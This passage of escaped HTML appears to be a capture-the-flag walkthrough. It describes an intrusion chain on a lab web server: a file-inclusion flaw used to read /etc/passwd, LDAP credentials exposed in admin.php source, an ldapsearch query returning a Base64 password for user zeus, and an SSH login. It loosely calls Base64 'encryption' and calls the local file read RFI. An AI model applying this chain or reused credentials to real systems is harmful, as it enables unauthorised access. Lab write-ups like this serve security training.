/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgPCbx03-I_tuLct80HVbwzUl7lt8NM4UwQiObXHf0wJQANODzB06wnnPNC69UtkxcNXvJZAonelEg8BF_irC0rN3vf-94lsoZhwsEwrA5iQvzgmxLy2FkGEwdnomKQnKJ0Yc4X7sz92pwse7KlEkGvuqAhhmKZZjGRSqnwriHGGilXyrvoX96xQ6i0Jw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;215&quot; data-original-width=&quot;440&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgPCbx03-I_tuLct80HVbwzUl7lt8NM4UwQiObXHf0wJQANODzB06wnnPNC69UtkxcNXvJZAonelEg8BF_irC0rN3vf-94lsoZhwsEwrA5iQvzgmxLy2FkGEwdnomKQnKJ0Yc4X7sz92pwse7KlEkGvuqAhhmKZZjGRSqnwriHGGilXyrvoX96xQ6i0Jw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- View-sourcing&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt; home.php&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; there is an interesting URL that leads to the idea of &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;LFI (Local File Inclusion)&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhHafTNRUlpDRmVmATAUVtSAwsv0eKEVOf2BoMFfs1JeRqRqhjtaVvOrlq_Rw9K6FKlhYM0tfozdok1rp1ynPTHmRcF20m__S56PcZSNUaXv70jAsD83iAjCpodGRFyFBjcEo4nTFqeWnY3KoYiTUyphst4aEFhhmLmEAUH3pkif0jRtJjMwf3HgNfg3g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;383&quot; data-original-width=&quot;710&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhHafTNRUlpDRmVmATAUVtSAwsv0eKEVOf2BoMFfs1JeRqRqhjtaVvOrlq_Rw9K6FKlhYM0tfozdok1rp1ynPTHmRcF20m__S56PcZSNUaXv70jAsD83iAjCpodGRFyFBjcEo4nTFqeWnY3KoYiTUyphst4aEFhhmLmEAUH3pkif0jRtJjMwf3HgNfg3g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking the URL it connects to the localhost 127.0.0.1 and the page &lt;b&gt;portraits.php&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjc6WrIlXDoXHSPT8icAv7O-gf-wm9RDCzp1j8oVKnlAObO0gF9h-cUaLkXEpNCrt-ZMZV7vEyI-jzMbZucLqSLxFVWl9dAZm1dU_DUHXzduFkHoKO9ZVezB-hDZ0YIrrTi1qANX808ozGLm2mE03nIaLS-WkdudWC4cnHgOCnObyJf5BQon_WGG8FbeQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;583&quot; data-original-width=&quot;961&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjc6WrIlXDoXHSPT8icAv7O-gf-wm9RDCzp1j8oVKnlAObO0gF9h-cUaLkXEpNCrt-ZMZV7vEyI-jzMbZucLqSLxFVWl9dAZm1dU_DUHXzduFkHoKO9ZVezB-hDZ0YIrrTi1qANX808ozGLm2mE03nIaLS-WkdudWC4cnHgOCnObyJf5BQon_WGG8FbeQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally we discover that the webpage is vulnerable to &lt;b&gt;RFI&lt;/b&gt;, because we can read &lt;b&gt;/etc/passwd&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjioXx5FSRmcxYZwNov6CYbjisGT8DNvwW82C1vTI6ZTToQ948rySsfj73LnY8-jnXgqSzWcm4VMNN-RNO_vkQtfVJdOAa0LIPKpt8KZLvaNVISFZFzYSLdV8YIf-udB6BmlJ_gVI8lpq928FEp--YUDyGDUJ_thS5U8ON-Lv8SrT24v5zT_6o13DX7DQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;339&quot; data-original-width=&quot;988&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjioXx5FSRmcxYZwNov6CYbjisGT8DNvwW82C1vTI6ZTToQ948rySsfj73LnY8-jnXgqSzWcm4VMNN-RNO_vkQtfVJdOAa0LIPKpt8KZLvaNVISFZFzYSLdV8YIf-udB6BmlJ_gVI8lpq928FEp--YUDyGDUJ_thS5U8ON-Lv8SrT24v5zT_6o13DX7DQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;admin.php&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiKZHPha0bC33zQfZA630D9ceGJXD9_EA9HTwbrQqwZ8LAIzHPJJ9SicYNOi2wlWlpicng4EpK-ghhGJLYFeeJQJjxap52VIIeKIX8P6ur_9Ox0jJomjdn9vqEmzdVOcC-zydxy2HXL_KUiEaN0V9GwjzCD0h5jfcQuodOx110Aqq8-T9WJ0mEPbZ9xDQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;446&quot; data-original-width=&quot;745&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiKZHPha0bC33zQfZA630D9ceGJXD9_EA9HTwbrQqwZ8LAIzHPJJ9SicYNOi2wlWlpicng4EpK-ghhGJLYFeeJQJjxap52VIIeKIX8P6ur_9Ox0jJomjdn9vqEmzdVOcC-zydxy2HXL_KUiEaN0V9GwjzCD0h5jfcQuodOx110Aqq8-T9WJ0mEPbZ9xDQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- View-sourcing &lt;b&gt;admin.php&lt;/b&gt; we discover credentials&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;admin:qMDdyZh3cT6eeAWD&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;for LDAP:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgRCYgldU0BcICfOyGE_q8Yyt5ThEAuwsmTLGFcfL1SLmidufsnF6qllRwCDYzfpaiAeewNdH1uQ8imrJ8UZ0o0LbAn-n3XO3d58EDeG7zYfeSeYfVOs38j7AkcZdFRL20vEZKT4dnXfChwIb1RscIJWmhOxAdLfMbceI_ilyxC7LmTIkCnIPoLtnJ5Dw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;707&quot; data-original-width=&quot;812&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgRCYgldU0BcICfOyGE_q8Yyt5ThEAuwsmTLGFcfL1SLmidufsnF6qllRwCDYzfpaiAeewNdH1uQ8imrJ8UZ0o0LbAn-n3XO3d58EDeG7zYfeSeYfVOs38j7AkcZdFRL20vEZKT4dnXfChwIb1RscIJWmhOxAdLfMbceI_ilyxC7LmTIkCnIPoLtnJ5Dw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;ldapsearch&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; opens a connection to LDAP server at port 389 and provides a Base64 encrypted password &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;Y2V0a0tmNHdDdUhDOUZFVA==&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; for user &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;zeus&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhLT1jmkXBP2IofzTssYf3Sml0Ql__tMROsIrazcrvknTWolW_-AYnWiPNXjZQ0IIuiMAEgc4gyssaMNyWHUwcqOvnuNvPLcpDikHLfyja9l3jJGXOB9C5Q6oEG8SZnpV62megQ8X7apAM3hbF0i7F-S6JlIEtnaroGCTtO2nwIGbHeQTbS-Zj-Ilolcg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;825&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhLT1jmkXBP2IofzTssYf3Sml0Ql__tMROsIrazcrvknTWolW_-AYnWiPNXjZQ0IIuiMAEgc4gyssaMNyWHUwcqOvnuNvPLcpDikHLfyja9l3jJGXOB9C5Q6oEG8SZnpV62megQ8X7apAM3hbF0i7F-S6JlIEtnaroGCTtO2nwIGbHeQTbS-Zj-Ilolcg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjMuuFx5jFvjDWj5nYKuQ6zS4xJJ4NcWZ_rXURC3TLVWtjnpGccMFeAA70T3JyI5ub_6nXQHvKVRDBflGYZDxYgJssHcMwL05_QWsuIfHq2D-lMC0TGTa4YUI2wGcDJui6oUiAq4-pk0jTDLICjAxXIW-qMLnIRT1oGYS5YfiTRZnNc5AtaPbRCnm266Q&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;78&quot; data-original-width=&quot;446&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjMuuFx5jFvjDWj5nYKuQ6zS4xJJ4NcWZ_rXURC3TLVWtjnpGccMFeAA70T3JyI5ub_6nXQHvKVRDBflGYZDxYgJssHcMwL05_QWsuIfHq2D-lMC0TGTa4YUI2wGcDJui6oUiAq4-pk0jTDLICjAxXIW-qMLnIRT1oGYS5YfiTRZnNc5AtaPbRCnm266Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Decrypting&amp;nbsp;&lt;b&gt;Y2V0a0tmNHdDdUhDOUZFVA==&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhNzVTkoZoqWAZDndvPWLzN_68g_4ByOKk68fps2rOAmfhy4_aD1eteT57ib3OD0gkjFBVa5mj59523-9iaNW-b29fIPxfOsEteE2iJ1T2Tw-md5XbF8dq_jvS_KwLR578zbZ3ueup4oVhLh6xey91GGp5V7gHHzfBGIshOhCd_-T_87E8tk27kiJQ-Iw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;121&quot; data-original-width=&quot;379&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhNzVTkoZoqWAZDndvPWLzN_68g_4ByOKk68fps2rOAmfhy4_aD1eteT57ib3OD0gkjFBVa5mj59523-9iaNW-b29fIPxfOsEteE2iJ1T2Tw-md5XbF8dq_jvS_KwLR578zbZ3ueup4oVhLh6xey91GGp5V7gHHzfBGIshOhCd_-T_87E8tk27kiJQ-Iw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now we can SSH:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgu2fz2kpjF_VfDZPdURbOaVvsyzmd9azpQPx8uqWSTRZ3GTGp6cu-4PjgBHM51CO-uRC5x9DV65BCEUrFzdLZBeLLrASbNgENbCC_VH32cajdTpdyGwxXXLNWL9HmkwnDNd_dpkMTc-l1MmmFvmbTpRXUubIP2gb1nOzgOYAS7VinfnErALBOMHDAbJg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;306&quot; data-original-width=&quot;948&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgu2fz2kpjF_VfDZPdURbOaVvsyzmd9azpQPx8uqWSTRZ3GTGp6cu-4PjgBHM51CO-uRC5x9DV65BCEUrFzdLZBeLLrASbNgENbCC_VH32cajdTpdyGwxXXLNWL9HmkwnDNd_dpkMTc-l1MmmFvmbTpRXUubIP2gb1nOzgOYAS7VinfnErALBOMHDAbJg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 